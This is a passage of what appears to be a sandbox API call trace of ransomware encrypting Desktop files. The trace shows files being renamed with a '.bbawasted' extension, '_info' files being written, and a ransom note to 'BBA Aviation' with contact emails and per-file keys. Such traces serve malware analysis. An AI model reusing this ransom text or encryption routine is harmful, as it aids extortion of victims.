lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0207.442] lstrcpyW (in: lpString1=0x6adb7a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0207.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Gsep Gy9g8U9SV5WI.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\gsep gy9g8u9sv5wi.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Gsep Gy9g8U9SV5WI.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\gsep gy9g8u9sv5wi.jpg.bbawasted")) returned 1 [0207.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\Gsep Gy9g8U9SV5WI.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\gsep gy9g8u9sv5wi.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0207.477] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0207.477] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x8c69 [0207.477] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8c69) returned 0x640000 [0207.477] CloseHandle (hObject=0x27c) returned 1 [0207.497] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0207.498] CloseHandle (hObject=0x280) returned 1 [0207.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0207.498] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6570) returned 1 [0207.499] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0207.499] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0207.499] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a64e8) returned 1 [0207.499] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0207.499] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0207.836] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0207.836] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0207.836] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0207.836] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ZoL3w/JpeeZbC16OE10cujX+ZDtvNJyIC8jYf3XhIPnp03E7VnotzGxyCjvipyvo\r\nCnIh23PEr3vB7LBW8tiRisw3Rq2Owghnm7SxhiaO01+d9z6ptLoWvJT3EdbvNVN+\r\nUXmUc9SHD20NnwLI5g1E9W3Zge0fBR8+1AgpHO9yVtAPz8/yw7MKgleJByzPr4CD\r\n+qWNDYdrtD2pgSa8OnPqRSYzh4q5CTX2aMKr9m6K4KDXilHTAhOlWDm9qLfWcJra\r\nI4DsxOQOHuhCAqiEyd1RN36zy1muyjji2IzkcDt280adxHUX9Ek26yAzlkPbRM+u\r\npySmFQKv/Ehw/zdl+QJ4UAepAsGY11rh1z1CwOFnBUPzjZFZ5ZPt3ImZ5VXjfFQN\r\n3ndw7PpjQO6zOTKUitcXB4/D81NvouKZZ6XvaGCtm0zA+PEljj6/34kMXiGnLGap\r\nzjlmeF4yiLSyurwgIhYwmrhj6wEiL0cgW4Vls303KFZYXb9fGVOTnhmtXHh1n4kP\r\n2nk9igW4kAjay61Qew5gsYP65vZX423yTg/OpBQiyx7YMTuSavQTAQJz3BIXLL8m\r\nuKO51EDbNhgipolebYdV0F2gO7tN6CZltDCQdAcLNMhUTpuedMkUNlmmSg8YxzMO\r\n5qE+hlMMd+8QCHjA1xOquZ8SKxmo5CtsSV66VNsuWgo=[end_key]\r\nKEEP IT\r\n") returned 984 [0207.836] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0207.836] WriteFile (in: hFile=0x290, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0207.836] SetEndOfFile (hFile=0x290) returned 1 [0208.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0208.332] CloseHandle (hObject=0x290) returned 1 [0208.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0208.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a21f8 | out: hHeap=0x660000) returned 1 [0208.337] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a68a0) returned 1 [0208.339] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0208.339] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0208.339] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\nu9kIj.gif") returned 38 [0208.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x256) returned 0x6adb18 [0208.339] lstrcpyW (in: lpString1=0x6adb64, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0208.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.339] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6020) returned 1 [0208.340] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0208.340] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0208.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\nu9kIj.gif.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\nu9kij.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0208.341] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0208.342] SetEndOfFile (hFile=0x290) returned 1 [0208.342] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.342] lstrcpyW (in: lpString1=0x6adb64, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0208.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\nu9kIj.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\nu9kij.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\nu9kIj.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\nu9kij.gif.bbawasted")) returned 1 [0208.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\nu9kIj.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\nu9kij.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0208.344] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0208.344] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x40f4 [0208.344] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x40f4) returned 0x650000 [0208.344] CloseHandle (hObject=0x288) returned 1 [0208.354] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0208.354] CloseHandle (hObject=0x28c) returned 1 [0208.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0208.355] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6790) returned 1 [0208.355] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0208.355] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0208.356] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0208.356] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0208.356] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0208.574] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0208.574] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0208.574] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.574] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]atQmPGIhEGPFCKsBH9uKVvxGUBLZT0/VIeRya1kG10kNqtVeeOjfVxqt0QRb4hvf\r\nL8cl3a4HeAz7z9Z69G0BC3sT5NYi8AdRRlzTPVN7+bCVcTBCPBSEt5oScLiOxWyf\r\nStfx1UUi5P1G4tnP9XQopUmWJOJI3MvRDQNi8iU4t5thg4Ln2tDbH2uk5lZsejoK\r\n5Lj1IyG7AC169W+C1TNZw1ikVb2tCN8Ry9SIRwmDpg9i7HP6d4EUMD0ENBtQUJxk\r\nCjpXceoj5/bykgPzgXgcfqbZEtpSWM0Cz6RFpqvNWj/klg6w+gxVLLreubtCq8G+\r\nC1JV2+acKYxyepIbyouXnjZseOZi9CMwAqqoFp25yxVI5lVRGCIKiYv21gKQfE4i\r\nFEKgiLLyPyfTJGDezoZNbMAUXhyH0Clqt9ElyGxQVKmKZYFmDdTN1uq72AAfH/dV\r\n0ToK1CacI5Dv16eMa4K96KM8p5C/Kkm/X3gOT0qdpdXidxXWn50ZZVqmXhdReqhz\r\nrhMDnsKB9xUJzfdN0sJqlzkyf17pVg4sl3ZK+72KupwAKMtQMsaNt7uZlVf+hiWy\r\nXzX+cJ4gVJVul9PyD0/Nu5CdPK5yJ3JwCwHC5Gw+tNCuFFRQuRwh6eWOKlhFMZkd\r\nSEi5niOvjf3eeie7wN+ti+Xjjo/YYHADSb4qsgwHafg=[end_key]\r\nKEEP IT\r\n") returned 984 [0208.574] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0208.574] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0208.574] SetEndOfFile (hFile=0x290) returned 1 [0208.577] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.577] CloseHandle (hObject=0x290) returned 1 [0208.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0208.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2f18 | out: hHeap=0x660000) returned 1 [0208.581] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6460) returned 1 [0208.581] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0208.581] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0208.581] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ovQDUkiEQ.wav") returned 41 [0208.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x6adb18 [0208.582] lstrcpyW (in: lpString1=0x6adb6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0208.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.582] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a69b0) returned 1 [0208.583] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0208.583] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0208.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ovQDUkiEQ.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\ovqdukieq.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0208.583] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0208.585] SetEndOfFile (hFile=0x290) returned 1 [0208.586] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.586] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.586] lstrcpyW (in: lpString1=0x6adb6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0208.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ovQDUkiEQ.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\ovqdukieq.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ovQDUkiEQ.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\ovqdukieq.wav.bbawasted")) returned 1 [0208.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ovQDUkiEQ.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\ovqdukieq.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0208.587] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0208.588] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x11c35 [0208.588] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11c35) returned 0x640000 [0208.588] CloseHandle (hObject=0x27c) returned 1 [0208.602] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0208.604] CloseHandle (hObject=0x280) returned 1 [0208.604] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0208.604] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6c58) returned 1 [0208.604] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0208.604] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0208.605] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6790) returned 1 [0208.605] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0208.605] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0208.616] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0208.793] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0208.793] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.793] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]K0ecoMpuFW+bsXu8rmgFmpFLQE6sY11nFa4c7aMUiTiXMnZmQENNc03m1rvY9Lrf\r\neDO2xWfAaVewf5O38Hgxfk34ONOmOS5sPZrCwHGLFB66eiVx+X0BzRYjwFgxXQwS\r\nJhfXnDfYtTZnyVeFuURDoQseM5zDwQhuoAWxKNmeLddR1rLVQXrD8rKi0beDLZ4K\r\nhs3q662uwtLxi+bQ6rzExEQLGWzfEv4s2OBFfab9iIG3l0yicc6W8HTjh5wPao7E\r\n9e9U5PB3zTB92c0s5YIpjbWVYwymxSwYHMg7Y+DlGw2mpntllRgjJpDm85LYsAzj\r\nKRao6/ca1HyvrvzdbbyAiOXbiyTMJ0j882eqhPkJ07eR5wfJ3+wS2qT6ERB8ItxM\r\nWK+opNaY6uXVaq8mqe4y+1jDUzHlgcT/rGmfqMZxf/c3kqyIFN3CLJ5r2v8egpDf\r\ns/pDyhWhr8PyPMIjifZ21QiAetEb1Dnjg1f4ZLy7Sv+AbQcP8IApxrNZ5gpoY6NL\r\nlEva9z9IWgnW9warDvGC2LZs4vT8TT993Qnt6ZWtTahn6uXtdx8K0pzeaGjCYU1F\r\nT1oyrqXXTK5jG4m6nL6neJ7qlRggdutcacTzmyISZ4Y3PgE4x8PsjdYU6EffYELM\r\n2b5Pyky3VzM4fIRuhdnual3+vWaJsLFdgBvzkfVEV+5=[end_key]\r\nKEEP IT\r\n") returned 984 [0208.794] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0208.794] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0208.794] SetEndOfFile (hFile=0x290) returned 1 [0208.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.797] CloseHandle (hObject=0x290) returned 1 [0208.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0208.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a41f8 | out: hHeap=0x660000) returned 1 [0208.801] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6790) returned 1 [0208.801] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0208.801] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0208.801] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\qBU9TmFTTc82vt.ods") returned 46 [0208.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x6adb18 [0208.802] lstrcpyW (in: lpString1=0x6adb74, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0208.802] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.802] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a69b0) returned 1 [0208.802] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0208.802] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0208.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\qBU9TmFTTc82vt.ods.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\qbu9tmfttc82vt.ods.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0208.803] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0208.806] SetEndOfFile (hFile=0x290) returned 1 [0208.807] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.807] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.807] lstrcpyW (in: lpString1=0x6adb74, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0208.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\qBU9TmFTTc82vt.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\qbu9tmfttc82vt.ods"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\qBU9TmFTTc82vt.ods.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\qbu9tmfttc82vt.ods.bbawasted")) returned 1 [0208.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\qBU9TmFTTc82vt.ods.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\qbu9tmfttc82vt.ods.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0208.808] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0208.808] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x7f79 [0208.809] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f79) returned 0x640000 [0208.809] CloseHandle (hObject=0x27c) returned 1 [0208.813] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0208.813] CloseHandle (hObject=0x280) returned 1 [0208.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0208.813] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f10) returned 1 [0208.814] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0208.814] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0208.814] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a63d8) returned 1 [0208.815] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0208.815] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0208.873] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0208.873] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0208.873] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.873] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, 